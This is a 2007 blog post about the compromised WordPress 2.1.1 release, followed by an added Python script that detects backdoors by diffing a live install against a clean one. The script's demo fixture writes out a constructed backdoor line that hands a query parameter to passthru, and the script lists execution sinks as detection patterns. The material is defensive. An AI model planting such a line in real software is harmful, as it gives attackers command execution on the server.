Original ExistDifferently.com Weblog of David, a Christian Network and Systems Manager, with topics ranging from Apologetics to Worldview, and some crypto, open source, programming, opinion, and daily life thrown in between.

Sun, 2007-03-04 (Mar 04)

WordPress 2.1.1 Dangerous, upgrade!

The official WordPress development blog is reporting that WordPress version 2.1.1 was compromised by a malicious hacker, and anyone who downloaded that version in the past several days needs to upgrade immediately to version 2.1.2. There are many more details at that link; I checked the two files they mentioned (feed.php and theme.php in the wp-includes folder) and I got one of the infected versions! If you do a “diff” and compare an infected file with one from the 2.1.2 download, the infected line becomes obvious. The vulnerability, as far as I can tell, allows an attacker to easily execute any command on the system that’s allowed for the user PHP is running as, by using a specially (but easily) crafted query string.
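As an added example (not from the original post or from WordPress), here is a script that automates the check described above: it hash-compares a deployed install against a clean reference download, lists the lines that exist only in the deployed copy, and flags any added line that feeds a request parameter straight into a code-execution function. The file contents and the injected line are constructed for the demo, not the real tampered 2.1.1 files.

```python
import difflib
import hashlib
import tempfile
from pathlib import Path

# Heuristic indicators: code-execution sinks fed directly from request input.
SINKS = ("eval(", "passthru(", "system(", "exec(", "shell_exec(")
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def compare_trees(reference: Path, deployed: Path) -> dict:
    """Map each differing relative path to its status and the lines only the deployed copy has."""
    ref = {p.relative_to(reference) for p in reference.rglob("*") if p.is_file()}
    dep = {p.relative_to(deployed) for p in deployed.rglob("*") if p.is_file()}
    report = {}
    for rel in sorted(ref | dep, key=str):
        if rel not in dep:
            report[rel.as_posix()] = {"status": "missing", "added": []}
        elif rel not in ref:
            report[rel.as_posix()] = {"status": "extra", "added": (deployed / rel).read_text().splitlines()}
        elif sha256_of(reference / rel) != sha256_of(deployed / rel):
            diff = difflib.unified_diff((reference / rel).read_text().splitlines(),
                                        (deployed / rel).read_text().splitlines(), lineterm="", n=0)
            added = [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]
            report[rel.as_posix()] = {"status": "modified", "added": added}
    return report

def is_suspicious(line: str) -> bool:
    """True when a line passes request input into a code-execution sink."""
    return any(s in line for s in SINKS) and any(i in line for i in SOURCES)

def suspicious_lines(report: dict) -> dict:
    """Reduce the report to added lines that match the backdoor heuristic."""
    hits = {path: [ln for ln in info["added"] if is_suspicious(ln)] for path, info in report.items()}
    return {path: lines for path, lines in hits.items() if lines}

def demo() -> tuple:
    """Build two constructed trees: a clean copy and one with a line injected into wp-includes/feed.php."""
    root = Path(tempfile.mkdtemp())
    clean_feed = "<?php\nfunction get_feed() {\n    return 'rss';\n}\n"
    for name in ("clean", "deployed"):
        (root / name / "wp-includes").mkdir(parents=True)
        (root / name / "wp-includes" / "theme.php").write_text("<?php\n// unchanged\n")
    (root / "clean" / "wp-includes" / "feed.php").write_text(clean_feed)
    # Constructed injected line: a request parameter handed straight to a shell sink.
    (root / "deployed" / "wp-includes" / "feed.php").write_text(
        clean_feed + "if (isset($_GET['q'])) { passthru($_GET['q']); }\n")
    report = compare_trees(root / "clean", root / "deployed")
    return report, suspicious_lines(report)

if __name__ == "__main__":
    for path, lines in demo()[1].items():
        print(path, "->", lines)
```

Point `compare_trees` at an unpacked clean release and your live install; an unchanged file never appears in the report, so anything listed deserves a look even if the heuristic does not fire.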

I’m still running 2.0.3 here as I write this, but I’m going to upgrade to 2.0.9 soon; I can’t run the 2.1.* series because I don’t have MySQL 4+ installed on my server yet.

Thanks to a post from security blogger Martin McKeay that was my first warning!
